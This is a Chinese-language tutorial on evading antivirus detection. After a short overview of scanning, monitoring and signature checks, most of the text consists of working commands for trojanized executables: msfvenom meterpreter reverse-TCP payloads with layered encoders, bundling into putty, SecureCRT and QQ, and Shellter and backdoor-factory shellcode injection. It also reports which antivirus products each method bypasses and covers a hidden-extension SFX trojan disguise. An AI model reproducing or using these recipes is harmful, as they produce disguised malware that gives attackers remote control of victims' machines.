目录

 病毒检测技术

扫描技术

监控技术

特征码检验

沙箱

免杀技术

metasploit免杀

概念

msfvenom参数

常用模块

自编码免杀

自捆绑免杀

多重编码免杀

 自捆绑+自编码

evasion  免杀模块

免杀框架

shellter

windows下载地址

kali安装框架

报错

使用方法

backdoor-factory

python模块安装

常用选项

操作

资源替换与数字签名

数字签名器下载地址

---

 病毒检测技术

  扫描技术

        1、扫描压缩包技术：即是对压缩包案和封装⽂件作分析检查的技术。
        2、程序窜改防护：即是避免恶意程序借由删除杀毒侦测程序⽽⼤肆破坏电脑。
        3、修复技术：即是对恶意程序所损坏的⽂件进⾏还原
        4、急救盘杀毒：利⽤空⽩U盘制作急救启动盘，来检测电脑病毒。
        5、智能扫描：扫描最常⽤的磁盘，系统关键位置，耗时较短。
        6、全盘扫描：扫描电脑全部磁盘，耗时较⻓。
        7、勒索软件防护：保护电脑中的⽂件不被⿊客恶意加密。
        8、开机扫描：当电脑开机时⾃动进⾏扫描，可以扫描压缩⽂档和可能不需要的程序

监控技术

        1、内存监控：当发现内存中存在病毒的时候，就会主动报警；监控所有进程；监控
        读取到内存中的⽂件；监控读取到内存的⽹络数据。
        2、⽂件监控：当发现写到磁盘上的⽂件中存在病毒，或者是被病毒感染，就会主动
        报警。
        3、邮件监控：当发现电⼦邮件的附件存在病毒时进⾏拦截。
        4、⽹⻚防护：阻⽌⽹络攻击和不安全下载。
        5、⾏为防护：提醒⽤户可疑的应⽤程序⾏为。

特征码检验

        文件特征码：检验文件本身  静态（主动对文件进行扫描查杀）
        内存特征码：检验文件运行过程有没有问题 动态（文件运行的时候）
        文件校验和：检验刚下载文件有没有问题的特征码和之后有没有改变出问题

沙箱

        https://developers.virustotal.com/
        https://www.virscan.org/language/zh-cn/
        https://s.threatbook.cn/
        https://habo.qq.com/
    动态查杀与静态查杀

免杀技术

修改特征码: 逆向
        既然杀毒软件在最开始时，使用了病毒特征码概念，那么我们可以通过修改病毒特征码的方式躲过杀软扫描。
        第一种是更改特征码，例如：一个文件在某一个地址内有 “灰鸽子上线成功” 这么一句话，表明它就是木马，只要将相应地址内的那句话改成别的就可以了。
        第二种是根据校验和查杀技术提出的免杀思想，如果一个文件某个特定区域的校验和符合病毒库中的特征，那么反病毒软件就会报警。如果想阻止反病毒软件报警，只要对病毒的特定区域进行一定的更改，就会使这一区域的校验和改变，从而达到欺骗反病毒软件的目的。
    
花指令免杀: 汇编
        花指令免杀是指，在程序`shellcode`或特征代码区域增添垃圾指令，这些指令没有实际含义，不会改变程序运行逻辑，但可以阻止反编译，现在杀软在检测特征码时，都会存在偏移范围，当我们使用花指令对特征码区域进行大量填充，这样就可以实现躲避杀软的特性。
    
加壳免杀
        加壳，程序加壳可以很好的躲避匹配特征码查杀方式，加密壳基本上可以把特征码全部掩盖。这里说的壳指加密壳，一些普通压缩壳，并不能起到改变特征码的效果，例如：`UPX`、`ASPack`等。
        现在杀软会在检测到文件采用加密壳之后，直接提醒用户，该文件存在问题。可以使用不常见加密壳对程序进行加壳，来躲避杀软，该方法理论可用，只通过加壳实现免杀，成功几率很小，现在基于虚拟机技术，内存监测技术的发展，通过加壳方式进行免杀的思路越来越窄。
    
二次编译
        `msfvenom`提供了多种格式的`payload`和`encoder`，生成的`shellcode`也为二次加工提供了很大便利，但是也被各大厂商盯得死死的。
        而`shikata_ga_nai`是`msf`中唯一的评价是`excellent`的编码器，这种多态编码技术使得每次生成的攻击载荷文件是不一样的，编码和解码也都是不一样。还可以利用管道进行多重编码进行免杀。
        目前`msfvenom`的`encoder`特征基本都进入了杀软的漏洞库。互联网上有很多借助于`C、C#、python`等语言对`shellcode`进行二次编码从而达到免杀的效果。
    
分离免杀: shellcode（机器码）
        shellcode是一段用于利用软件漏洞而执行的十六进制机器码。能够让攻击者反弹shell，因此称之为shellcode。因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后，塞入一段可让CPU执行的shellcode机器码，让电脑可以执行攻击者的任意指令。
    
资源修改
        ​数字签名   数字签名添加器
        ​白名单      把恶意程序修改成常见的程序的名称
    
资源替换
        ​版本信息, 发行者信息, 图标信息等

metasploit免杀

概念

        Metasploit自身已经提供了一定免杀机制，比如Evasion模块、MSF自带的C编译模块、大名鼎鼎的shikata_ga_nai编码等等，但由于msf被各大安全厂商盯的比较紧，所以这些常规的方法免杀效果肯定是比较差的，但有时把一两种常规方法稍微结合一下就能达到比较好的免杀效果。

msfvenom参数

–p 添加载荷payload–l 查看所有payload encoder nops。 –f 输出文件格式–e 编码免杀–a 选择架构平台–o 文件输出–x | -k 捆绑msfvenom -l [名称] #可以查看该模块的所有信息#These are valid: payloads, encoders, nops, platforms, archs, encrypt, formats, all

常用模块

x86/shikata_ga_naix86/xor_dynamicx64/xor_dynamic

自编码免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe#-e 要使用的编码模块#-i 进行编码的次数 最好不要超过20次常用模块x86/shikata_ga_naix86/xor_dynamicx64/xor_dynamic

自捆绑免杀

msfvenom -x SecureCRT.exe -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 lport=5555 -f exe -o /var/www/html/shell2.exe#没加-k 是不能运行的软件，加上就可以。

对QQ进行自捆绑

        对与QQ这些软件来说，以-k的形式捆绑软件，捆绑完也是运行不了的。但是可以换一种方式去运行木马。直接放在桌面肯定是运行不了的，他缺少运行所需要的dll文件，可以放在QQ的文件夹里面，然后把快捷方式发送到桌面。这样子是可以运行成功的。再开启QQ管家的前提条件下，我的木马仍然是可以成功进行连接运行的。而且可以给它

        用腾讯电脑管家进行静态扫描也不能扫描出木马，下载时候动态运行也扫描不出木马 。是个值得推荐的软件。它一下子扫描可能扫描不出来，但是反复操作的话还是会被查杀的

多重编码免杀

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.48.128 LPORT=4444 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty-32bit.exe -k -f exe > payload-putty.exe

效果：

可以过QQ管家，过不了火绒和360

 自捆绑+自编码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o putty2.exe

evasion  免杀模块

evasion/windows/windows_defender_exeevasion/windows/windows_defender_js_hta

免杀框架

shellter

        这个是可以直接再windows直接运行的软件，再kali中进行安装反而更加麻烦。这个再现在单纯使用这个软件进行免杀的话效果已经不明显了，基本不行了。现在的话，连QQ管家都是过不了的。

windows下载地址

https://www.shellterproject.com/download/

kali安装框架

apt-get update #更新apt-get install shellter#apt安装shellterdpkg --add-architecture i386 && apt-get update && apt-get install wine32#环境安装

报错

安装完成后，再加载更新的时候强制退出或者其他问题导致的报错：

wine: could not load kernel32.dll, status c0000135

这个问题和前缀有关，删除.wine或者创造一个新的前缀

~/.winemkdir -p ~/myapp/prefixexport WINEPREFIX=$HOME/myapp/prefixexport WINEARCH=win32export WINEPATH=$HOME/myappwineboot --initwinetricks#Winetricks是一个辅助脚本，用于在wine中下载并安装各种闭源的组件和运行库。

使用方法

A/M/HA: auto --> 快速配置M: manual --> 手动配置H: helpPE target: 需要写入模板的绝对路径,并且源文件备份导了backups中--Kali备份文件路径：/usr/share/windows-resources/shellter/Shellter_Backups Enable Stealth Mode? (Y/N/H): Y //是否启用隐身模式 输入Y启用 #stealth mode: 隐身模式保留了受感染PE文件的原始功能，因此“隐身”是指人为因素。如果你只是需要一个后门，不要启用这个功能。#隐身模式：可以正常使用程序的功能，但是程序关闭后无法持续会话#后台模式：在内存进程中执行，不会被关闭Use a listed payload or custom? (L/C/H): L #使用攻击模块列表或者自定义？ 输入L 选择PayloadSelect payload by index: 1 #选择第一个#出现这种报错说明该文件无注入点：No available locations for shellcode injection were found after last stage filtering.

backdoor-factory

python模块安装

sudo pip2 install --upgrade pipsudo pip2 install --upgrade setuptoolssudo pip2 install pefilesudo pip2 install setuptoolssudo pip2 install capstone###################################1、采用国内源，加速下载模块的速度2、常用pip源：-- 豆瓣：https://pypi.douban.com/simple-- 阿里：https://mirrors.aliyun.com/pypi/simple3、加速安装的命令：-- >: pip install 模块名 -i https://pypi.douban.com/simple

常用选项

-h #查看帮助信息-f #测试指定文件-S #检查软件是否支持patch-s #指定payload，可以通过"show"来查看-H #指定回连的IP地址-P #指定回连的端口-J #使用多个代码缝隙注入-c #查看软件的代码缝隙-l num #和" -c" 一起使用,查看大于num的缝隙-o #指定输出软件的名称

操作

探测缝隙

./backdoor.py -f putty-32bit.exe -S#检测是否可以插入shellcode./backdoor.py -f putty-32bit.exe -c -l 500 #探测代码裂缝./backdoor.py -f /root/putty.exe -s show #列出payload

 生成木马

/backdoor.py -f /root/Desktop/putty-32bit.exe -s iat_reverse_tcp_stager_threaded -H 192.168.48.128 -P 4444 -o tim.exe#用MSF-meterpreter反向TCP监听

自定义shellcode免杀--过火绒

生成一个可以过火绒免杀的木马思路：先用msf进行多从编码，生成一个源文件。然后再把源文件用后门工厂进行生成木马。msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.128 lport=4444 -e x86/shikata_ga_nai -i 15 -f raw -o shellcode.c#生成shellcode：./backdoor.py -f /root/Desktop/putty-32bit.exe -s user_supplied_shellcode_threaded -U shellcode.c -H 192.168.48.128 -P 4444 -o TEST.exe#注入shellcode#开启msf监听

资源替换与数字签名

数字签名器下载地址

https://gitcode.net/mirrors/k8gege/k8tools ### 自解压SFX: 把压缩包生成为exe可执行程序, 执行后会自动解压。 用到的工具: winrar 或者有自解压选项的压缩工具– 1.右键添加压缩文件– 2.创建自解压文件栏✔（SFX) – 3.点击高级-->点击自解压选项– 4.点击更新-->覆盖所有文件夹– 5.点击设置-->加入图标路径、木马路径– 6.点击文本和图表-->添加ico图标– 7.点击模式-->全部隐藏– 8.确定，然后隐藏文件拓展名